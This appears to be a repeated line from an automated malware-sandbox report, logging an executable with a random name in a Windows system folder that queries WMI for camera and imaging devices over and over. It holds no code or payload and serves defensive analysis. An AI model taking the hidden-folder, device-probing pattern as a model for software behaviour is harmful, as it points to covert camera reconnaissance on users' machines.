Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
